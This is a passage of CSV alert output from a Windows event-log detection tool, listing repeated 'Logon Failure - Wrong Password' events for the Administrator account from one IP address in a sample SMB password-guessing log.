NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YzT8vF7ANYnjSRgd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4eYIoww4uL6oYZu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DpO8L2Fky4zYwp2q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGmxSy48sphENTiY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tQVAkjteLFK0hbyE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMWKsQ8l0j9fZPfA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ct7xYUYH9sr7mva : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBn0XxaPOZQokJ0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nQELRxrGuXqkYgO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5eT0mykgLNZQygq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qMyIqRidF6oBdzog : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ULnnFcF98k9zpNTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j5k02pcelZNGwF3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qfcC6LqJqs0EeGjE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXALYkkitmyAFq14 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIqQmExq22WrW4md : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ydHqjdZhLMI9gjfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSe45VZNPdovPbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hiHlcR6qNGE0P7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iT3jPdHr89RqPlyd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0QFnABeYK39XEntR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5plMYSBQi5mKmdlk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TaxWckQUCMgWvCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81xZ7iisEyTABmUm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qYiQ2xjMQFQwH2XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRN8e3yzZzxc2p3A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCa6PN0C7XznvipG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hFqjIXbEb7eWUFUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkrVjLgnJZlIyXpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2r5tyuIYijAXN5be : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AgjQNe9hQrLIETDn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNoInpFTsixZDIu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ladJUS6I0HMIwdef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oW63pJlVtjgn3YY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKNu8b2To2Y1twUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9sN5xm3GytfmM7G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtQQS61GYBm6WUUz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WxxawZZMhNCGHxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sKP8G2VgJlrr9LMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvOsNQpk3c5p1FgK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7oz7NPh5Z8UrDPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvzNFOLBlBv98Do4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KJmYytO30Icc6Rb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zro3jLjFXWZ2o8VL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Z2J8VYeuxd9fKcG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXMjOKLfMex7OmMv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgbm3YeoGxCa22Il : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7MEstBFjiWhVE18 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8Y2kDEiMZWf0znn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBAFVgPIOyCvtdRs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s3pFhUcspF6lzQXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39LFXXW715pQoADC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: in4ewyxouUnxQzCQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOtV8CLIU6Mcw2ty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8NJqimhGrg9uhTh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XEWLTOY9magV0h6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Di1MZsJx52Bi8E6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22MdB2QodynfibkF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qojej3YITXvXJ6Pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CLjbQ6timbdQoufd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aZgoAnGEFwXN88bQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZFWoL9XUMJdfNnY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x000TRnXfVtPAQSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNHWWHDOpXQyNdrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1irbPdOoUfvq1MXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dCflbKOMPJRXQHsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zuy6nD4EXeGzEy5e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xkig4u0LIS9v3HMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94RbUrUcMf6VhP8A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X9f7wCJ3wI9RmZTL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkVs1viGo4RxhFaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKMLt6t01vUDDq1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYSif8ADOkC8aInB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EpmraSe2sxFVupTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VPtfy3AxXpt9D3bx : IP Address: 192.168.198.149 : AuthPackage: 